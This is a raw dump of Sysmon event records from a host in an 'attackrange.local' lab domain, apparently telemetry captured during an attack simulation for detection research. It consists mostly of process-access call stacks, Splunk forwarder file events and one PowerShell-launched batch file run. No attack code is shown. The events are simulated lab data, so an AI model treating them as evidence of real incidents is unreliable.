12:08:36.524{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010500Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:36.509{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010499Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:36.509{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010498Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:36.509{266CAFBE-64C1-6064-9100-00000000AE01}51083828C:\Windows\system32\csrss.exe{266CAFBE-6644-6064-6701-00000000AE01}4524C:\Windows\SysWOW64\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x800000000000000010497Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:36.509{266CAFBE-65AB-6064-5001-00000000AE01}24562612C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe{266CAFBE-6644-6064-6701-00000000AE01}4524C:\Windows\SysWOW64\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+781c0|C:\Windows\SYSTEM32\ntdll.dll+77d8e|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_32\System\e4e1c2ddf26e804ce437760cd9a5ba23\System.ni.dll+23cc02(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_32\System\e4e1c2ddf26e804ce437760cd9a5ba23\System.ni.dll+1aaaa4(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_32\System\e4e1c2ddf26e804ce437760cd9a5ba23\System.ni.dll+1aa39c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Manaa57fc8cc#\e05ebf906fda9e1c579ba89d8f0679ea\System.Management.Automation.ni.dll+e5d4219a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Manaa57fc8cc#\e05ebf906fda9e1c579ba89d8f0679ea\System.Management.Automation.ni.dll+e537afa3(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Manaa57fc8cc#\e05ebf906fda9e1c579ba89d8f0679ea\System.Management.Automation.ni.dll+e537aca0(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Manaa57fc8cc#\e05ebf906fda9e1c579ba89d8f0679ea\System.Management.Automation.ni.dll+e5cb9293(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Manaa57fc8cc#\e05ebf906fda9e1c579ba89d8f0679ea\System.Management.Automation.ni.dll+e5344c0d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Manaa57fc8cc#\e05ebf906fda9e1c579ba89d8f0679ea\System.Management.Automation.ni.dll+e5394e98(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Manaa57fc8cc#\e05ebf906fda9e1c579ba89d8f0679ea\System.Management.Automation.ni.dll+e537ce58(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Manaa57fc8cc#\e05ebf906fda9e1c579ba89d8f0679ea\System.Management.Automation.ni.dll+e537ce58(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Manaa57fc8cc#\e05ebf906fda9e1c579ba89d8f0679ea\System.Management.Automation.ni.dll+e537cd75(wow64) 154100x800000000000000010496Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:36.520{266CAFBE-6644-6064-6701-00000000AE01}4524C:\Windows\SysWOW64\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Temp\1.bat""C:\Temp\ATTACKRANGE\Administrator{266CAFBE-64C3-6064-2804-0B0000000000}0xb04282HighMD5=0FEC5F30E705EADAEA5E9144F2FB12DC,SHA256=614CA7B627533E22AA3E5C3594605DC6FE6F000B0CC2B845ECE47CA60673EC7F,IMPHASH=B20DE9D5F257E3C5BDD2834F89FC042A{266CAFBE-65AB-6064-5001-00000000AE01}2456C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" 23542300x800000000000000010507Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:37.540{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0C610C498DECEC987AF876B73F1E37A7,SHA256=4534D13A47AA130E25BF8BC470CDC36FCE7B427956CE41736A26831CDE54A7A0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010506Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:37.509{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=200CC844A2E798C3F225D4206AA23867,SHA256=2E146C593F6CF75D79E2203B06B51DF8C43237F24EDB719B06BEF6E91214BCC1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010508Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:38.680{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=07B9A6C01B4F3F77892DC80C6AE96087,SHA256=DA380B00E98138D27456563A38E6AD21E26171C12C5D1E372766DB3C0A7635E0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010509Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:39.712{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A1F87DCDE698731E7B7792A9CF43034E,SHA256=4F14F3CC821485F3CBF5E588D8A9EF0E66DD8A0C99D42CF09E9D767D1E96AE94,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010511Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:40.790{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=56A67C67AADE4359BC16263E9819EA56,SHA256=D862AEC7EA53B17FC6AF42FEFA4D35D18EACE04BD8F87686B50930506C57988A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010510Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:40.743{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3997B275B4CB4E0956526DD0689C0174,SHA256=4E3DE5B1CCD37EF80C9AD50D73C31281238EEE7EEF39F2750078AF2808EF38C4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010512Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:41.805{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FC10ACD49093432600A06938F5D97AAC,SHA256=40573D67F1FED084E82B09C08F5B03805DC8A7260CE9129F740B53EC87F8097A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010513Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:42.805{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4DF4E87F2580B5724E8276CA0F083F2D,SHA256=6682F67935ECF8B6AF8762C803D02546B679E21CDD674FCB5BF1CB8AFDABF57D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010515Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:43.852{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=46135D75415169E8B0919FF1F3EDC0B8,SHA256=108FA214775284A42A0D6D244FD507E4409E2C3C25BD8454BE2E607ADB83C9E5,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000010514Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:41.476{266CAFBE-64F5-6064-0301-00000000AE01}6500C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53701-false10.0.1.12-8000- 23542300x800000000000000010518Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:44.867{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C0BF8B607D32BFFC9000FBE10D5D8912,SHA256=7DF5E0AAB9F0820A66337482F08FD82A0E6605A435D3C1C9BF91D9735ABF9F6A,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000010517Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:44.461{266CAFBE-646C-6064-1100-00000000AE01}1200C:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.dat2021-03-31 12:00:44.752 23542300x800000000000000010516Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:44.461{266CAFBE-646C-6064-1100-00000000AE01}1200NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=DE6013F772D81F75E1233E7EBFB6600F,SHA256=0FCC9084066CA3925515E7D641985CEE8FE9FD5D03976B72378850A3D89C4746,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010544Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:45.898{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B97D020CD9D294E52ABEDA426B5D1012,SHA256=0B967A4579300DEF0ECECDABDED6DE68897FB855A1000F91BB0A7FA1B2AE4E11,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000010543Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:45.086{266CAFBE-646C-6064-0D00-00000000AE01}6126772C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1200-00000000AE01}1196C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010542Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:45.086{266CAFBE-646C-6064-0D00-00000000AE01}6126772C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-0C00-00000000AE01}592C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010541Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:45.086{266CAFBE-646C-6064-0D00-00000000AE01}6126772C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A700-00000000AE01}4388C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010540Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:45.086{266CAFBE-646C-6064-0D00-00000000AE01}6126772C:\Windows\system32\svchost.exe{266CAFBE-64C4-6064-9D00-00000000AE01}5112C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010539Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:45.086{266CAFBE-646C-6064-0D00-00000000AE01}6126772C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1100-00000000AE01}1200C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010538Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:45.086{266CAFBE-646C-6064-0D00-00000000AE01}6126772C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-0C00-00000000AE01}592C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010537Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:45.086{266CAFBE-646C-6064-0D00-00000000AE01}6126772C:\Windows\system32\svchost.exe{266CAFBE-64C4-6064-9D00-00000000AE01}5112C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010536Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:45.086{266CAFBE-646C-6064-0D00-00000000AE01}6126772C:\Windows\system32\svchost.exe{266CAFBE-64C3-6064-9A00-00000000AE01}3164C:\Windows\System32\rdpclip.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010535Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:45.086{266CAFBE-646C-6064-0D00-00000000AE01}6126772C:\Windows\system32\svchost.exe{266CAFBE-64C1-6064-9400-00000000AE01}984C:\Windows\system32\dwm.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010534Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:45.086{266CAFBE-646C-6064-0D00-00000000AE01}6126772C:\Windows\system32\svchost.exe{266CAFBE-6497-6064-8200-00000000AE01}4432C:\Windows\system32\WinrsHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010533Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:45.086{266CAFBE-646C-6064-0D00-00000000AE01}6126772C:\Windows\system32\svchost.exe{266CAFBE-647E-6064-4400-00000000AE01}3944C:\Windows\system32\wbem\wmiprvse.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010532Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:45.086{266CAFBE-646C-6064-0D00-00000000AE01}6126772C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3800-00000000AE01}3432C:\Windows\System32\vds.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010531Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:45.086{266CAFBE-646C-6064-0D00-00000000AE01}6126772C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3900-00000000AE01}3440C:\Windows\system32\wbem\unsecapp.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010530Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:45.086{266CAFBE-646C-6064-0D00-00000000AE01}6126772C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010529Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:45.086{266CAFBE-646C-6064-0D00-00000000AE01}6126772C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3100-00000000AE01}2672C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010528Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:45.086{266CAFBE-646C-6064-0D00-00000000AE01}6126772C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010527Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:45.086{266CAFBE-646C-6064-0D00-00000000AE01}6126772C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010526Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:45.086{266CAFBE-646C-6064-0D00-00000000AE01}6126772C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010525Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:45.086{266CAFBE-646C-6064-0D00-00000000AE01}6126772C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-0E00-00000000AE01}1080C:\Windows\system32\LogonUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010524Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:45.086{266CAFBE-646C-6064-0D00-00000000AE01}6126772C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-0E00-00000000AE01}1080C:\Windows\system32\LogonUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010523Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 